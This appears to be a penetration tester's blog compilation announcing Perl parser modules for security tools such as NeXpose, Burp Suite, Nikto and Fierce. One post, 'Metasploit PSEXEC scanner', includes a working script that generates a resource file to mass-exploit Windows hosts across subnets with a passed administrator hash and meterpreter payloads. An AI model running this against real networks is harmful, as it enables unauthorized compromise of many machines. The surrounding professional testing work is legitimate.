NexposeSimpleXML::Parser

NeXpose is a vulnerability management scanner that supports network based services, databases and web applications. I recently uploaded a Perl Module for the Simple XML format. It can be found here at NexposeSimpleXML::Parser on CPAN.

Here is an example of using the module:


my $nxp = new NexposeSimpleXML::Parser;
my $parser = $nxp->parse_file('test1.xml');
# NexposeSimpleXML::Parser Object
my @host = $parser->get_all_hosts();
# Array - NexposeSimpleXML::Parser::Host Objs
my $host1 = $hosts[0];
my @services = $host1->get_all_services();
# Array - NexposeSimpleXML::Parser::Host::Service Objs
my $s1 = $services[0];
my @vulns = $host1->get_all_vulnerabilities();
# Array - NexposeSimpleXML::Parser::Vulnerabilities Objs
# for the host OS.
@vulns = $s1->get_all_vulnerabilities();
# Array - NexposeSimpleXML::Parser::Vulnerabilities Objs
# for this service.
my $vuln1 = $vulnerabilities[0];
my @refs = $vuln1->get_all_references();
# Array - NexposeSimpleXML::Parser::References Objs
# for this specific vulnerability.


A free community edition of NeXpose is available at: http://www.rapid7.com/vulnerability-scanner.jsp

Let me know what you think. This module was written 100% in the air on my way home from Vegas…. Just sayin…

Regards,
Jabra

Advertisement

MetasploitExpress::Parser

Update: I have already uploaded the module to CPAN. The module can be found at: http://search.cpan.org/~jabra/MetasploitExpress-Parser/lib/MetasploitExpress/Parser.pod

In Vegas I ran into the developer of Seccubus at one of the speaker parties. We talked about the things were are currently working on (Fierce v2, Automation, etc). After a few minutes, he told me about his planned to improve Seccubus to be able to leverage many different tools in a single interface. After re-freshing my memory that Seccubus is also written in Perl, I thought, … well why not add Metasploit Express interation… Well, since you are reading the post I’m sure you can guess what happened.. I coded for around 4 hours at Defcon and MetasploitExpress::Parser was ready before his presentation on sunday.

Here is an example of using MetasploitExpress::Parser:

my $msf = new MetatsploitExpress::Parser;

my $parser = $msf->parse_file(‘test1.xml’);
#a MetasploitExpress::Parser Object

my @hosts = $parser->get_all_hosts();
#an Array of MetasploitExpress::Parser::Host Objects

my @services = $parser->get_all_services();
#an Array of MetasploitExpress::Parser::Service Objects

my @tasks = $parser->get_all_tasks();
#an Array of MetasploitExpress::Parser::Task Objects

my @events = $parser->get_all_events();
#an Array of MetasploitExpress::Parser::Event Objects

my @reports = $parser->get_all_reports();
#an Array of MetasploitExpress::Parser::Report Objects

Abstract:

Security Maturity

The maturity of an information security program can be judged by various
factors. The most important of which is understanding the environment, the
goals of the organization and teams/roles that are involved. This presentation
will discuss methods that can used to determine the state of an organizations
security program and ways to improve it in the future. Building a mature
security program doesn’t happen over night, however constant improvement over a
period of time will lead to a strong security program.

We will cover a few key concepts that are important for organizations that are
building strong security programs. The concepts we will cover include:
internal/external security assessments, web application development and risk
management.

BIO:

Joshua “Jabra” Abraham joined Rapid7 in 2006 as a Security Consultant. Josh has  extensive IT Security and Auditing experience and worked as an enterprise risk assessment analyst for Hasbro Corporation. Josh specializes in penetration testing, web application security assessments, wireless security assessments, and custom code development. He has spoken at BlackHat, DefCon, ShmooCon, SANs Pentest Summit, Infosec World, CSI, OWASP Conferences, LinuxWorld, Comdex and BLUG. In his spare time, he contributes code to open source security projects such as the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJ. He is frequently quoted in the media regarding Microsoft Patch Tuesday and web application security by ComputerWorld, DarkReading and SC Magazine.

Fierce v2.0 released at (Security BSides Las Vegas 2010)

Fierce is a network enumeration tool that uses many techniques (mostly using DNS) to gather a list of IPs controlled by an organization. The most common method is to provide Fierce with a domain. Last week at Security BSides in Las Vegas, I gave a talk about the newest version of Fierce. Version 2.0 includes tons of new functionality that the original version lacked. I also discussed the new functionality of Fierce v2 on Security Justice Episode 26.

Here is a small breakdown of the new techniques: Interactive mode for scanning IPs ranges, TLD bruteforce (also with an interactive mode), Virtual host detection and enumeration, ARIN lookups including lookups for every Nethandle, Whois enumeration, Reporting engine that includes TXT, XML and HTML report formats, rewrote all of the techniques to be Object Oriented with threading, ability to exclude or include techniques to ensure fine grained control of the scan and a ton more!

I have also been working on an XML parser module to extract data from Fierce using Perl. Parsing XML allows pentesters to extract the data from tools so they can automate the mundane tasks and work on more difficult things. The module is already on CPAN.

The official release of Fierce v2.0 can be found at:

http://trac.assembla.com/fierce

To check out the latest version of Fierce v2 from subversion, simply run the following command:

 svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/

The XML module (known as Fierce::Parser) can be found at:

http://search.cpan.org/~jabra/Fierce-Parser-0.08/lib/Fierce/Parser.pod

If you have any comments, questions or suggestions please let me know.

Pentesting with Perl at BlackHat 2010

The course I have been working on for a while now, known as “Pentesting with Perl” was released for the first time this year at BlackHat 2010 in Las Vegas. There was a ton of quality content that I put into the course including many of the techniques I have developed to automate the tedious tasks that need to be performed when conducting a penetration assessment.

What made the course unique was that all of the examples were based on useful techniques that I use on a daily basis. Many people learn best by using example, so I built the course to leverage practical examples when explaining the theories of using Perl.

For example, I built a script which processed a PDML file and coverted the ASCII codes using a hash. This a better example than just using something like: (apple => red, orange => orange), because it demonstrates value which can be applied immediately.

Based on the feedback we received, it looks like people really enjoyed the course. The only thing that the students wanted to change is to have more time for the labs. Therefore, I’m sure I will be teaching this training again but using a two day format instead of one. Pentesting with Perl was a great success and it’s only gonna get better! Ph33r!

Bootstrap Targets in BurpSuite

BurpSuite is by far, my favorite web application proxy. There is a limitation that I have found a unique way around, so I figured I would share it with everyone. BurpSuite does not have an easy way to import a list of targets when starting a web application assessment. Obviously, you can browse to the web applications using a browser, but this is time consuming. So we need a better way.

All that is needed is a method to make requests that pass through the proxy. So we can use LWP::UserAgent. Nmap is always helpful for finding open ports, so we can use that to speed things up as well. Nmap will find all of the web applications and then we can leverage Perl to populate BurpSuite’s target list.

First, we perform an nmap scan:sudo nmap -p 80,443 -sS -oX nmap-web.xml -PN

Now, we parse the output of the nmap scan and generate files that contain the web servers running on port 80/tcp and 443/tcp. I have written a Perl script to parse nmap XML files. This script can be found here. Using this script we simply execute:
perl nmap-parse.pl -f nmap-web.xml -p 80 > 80-tcp.txt
perl nmap-parse.pl -f nmap-web.xml -p 443 > 443-tcp.txt


Now, we just need to import each file and perform a request for each web application. The key is that we have BurpSuite listening locally, so that all of the requests will pass through the proxy. The script is called proxycrawl and it will populate the target list because it makes requests through the proxy. It can be found here.
perl proxycrawl.pl -i 80-tcp.txt
perl proxycrawl.pl -i 443-tcp.txt --ssl

After running this script, you should see all of the targets populated in BurpSuite and you are ready be begin your web application assessment.

Regards,
Jabra

Metasploit PSEXEC scanner (via Perl)

(01/14/09) Update: I built a psexec.pl script that can be found here.

Metasploit’s pexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish that Metasploit had, is a scanner version of the psexec exploit module. So I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:


#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser Administrator\n";
print "set SMBPass ADMINISTRATOR:HASH\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";
# first range
foreach(1.. 254) {
    print "set RHOST 192.168.1.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}
# second range
foreach(1.. 254) {
    print "set RHOST 192.168.2.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}


Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc


Lastly, we leverage Metasploit’s ability to execute commands passed into meterpreter via an resource file. Once Metasploit loads psexc.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

msfconsole -r psexec.rc

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.

Regards,
Jabra

Minor Updates for new modules

I received two bug reports today about Sslscan::Parser and Dirbuster::Parser. The bug reports said that I forgot to include Test::Class as a dependency for each of the modules. Therefore, I have updated both modules to version 0.02 to fix the issue.

The updated versions can be found here:

• Sslscan::Parser 0.02
• Dirbuster::Parser 0.02

If anyone has any comments or suggestions of any of the modules I have released recently please let me know. I’m happy to fix any bugs and improve the quality of the modules.

Regards,
Jabra

Nikto::Parser 0.01

Recently, I released several new security modules on CPAN. One of the modules is Nikto::Parser. It provides a module for extracting information from nikto so that users can build powerful web application testing tools. Nikto::Parser can be found here.

Here is an example of performing a nikto scan and then parsing the results with Nikto::Parser:


my $npx = new Nikto::Parser;
my @ips;
push(@ips,"127.0.0.1");
my $parser = $npx->parse_scan("/pentest/svn/nikto/", "", @ips);
foreach my $h ( $parser->get_all_hosts() ) {
    print "ip: " . $h->ip . "\n";
    foreach my $p ( $h->get_all_ports() ) {
        print "port: " . $p->port . "\n";
        print "banner: " . $p->banner . "\n";
        foreach my $i ( $p->get_all_items ) {
             print "Description:\n" . $i->description . "\n";
        }
    }
    print "---\n";
}

Burpsuite::Parser 0.01

Just to get everyone excited for my talk, “Synergy! A world where the tools communicate” at OWASP NYC today, I decided to release Burpsuite::Parser 0.01 a little early.

Here is an example of using the module:


my $bpx = new Burpsuite::Parser;
my $parser = $bpx->parse_file('burpsuite.xml');
#a Burpsuite::Parser Object
my @results = $parser->get_all_issues();
#an Array of Burpsuite::Parser::Issue Objects
foreach my $h ( @results ) {
     print "Severity: " . $h->severity . "\n";
     print "Host: " . $h->host . "\n";
     print "Name: " . $h->name . "\n";
     print "Path: " . $h->path . "\n";
     print "Proof of Concept:\n " . $h->issue_detail . "\n";
}


Version 0.01 of the module can be found at http://search.cpan.org/~jabra/Burpsuite-Parser-0.01/lib/Burpsuite/Parser.pod

One good thing to note, all of the request/responses are automatically included in the XML. To reduce the size of the XML, it may be helpful to generate an XML file without them. This will make parsing faster.

Enjoy!
Jabra

Burpsuite::Parser Example Script

For those know don’t already know… Portswigger released XML support for Burpsuite last week! Once I heard about this, I started working on a Perl XML parsing module. After the long weekend I have a version that is ready to be considered alpha quality. I plan to release the beta version on October 15th at during my presentation at OWASP NYC. Here is an example script demonstrating how easy it is to use Burpsuite::Parser:
#!/usr/bin/perl -w
use strict;
use Burpsuite::Parser;
my $bparser = new Burpsuite::Parser;
my $file;
if ( $ARGV[0] ) {
    $file = $ARGV[0];
}
else {
    print "usage: $0 [file.xml]\n";
    exit;
}
my $parser = $bparser->parse_file("$file");
foreach my $h ( $parser->get_all_issues() ) {
    print "Type: " . $h->type . "\n";
    print "Serial: " . $h->serial_number . "\n";
    print "Severity: " . $h->severity . "\n";
    print "Host: " . $h->host . "\n";
    print "Name: " . $h->name . "\n";
    print "Location: " . $h->location . "\n";
    print "Path: " . $h->path . "\n";
    print "Issue Background: " . $h->issue_background . "\n";
    print "Remediation Background: " . $h->remediation_background . "\n";
    print "Issue Detail: " . $h->issue_detail . "\n";
}

DM me on twitter(jabra), if you would like to help test the module.

Regards,
Jabra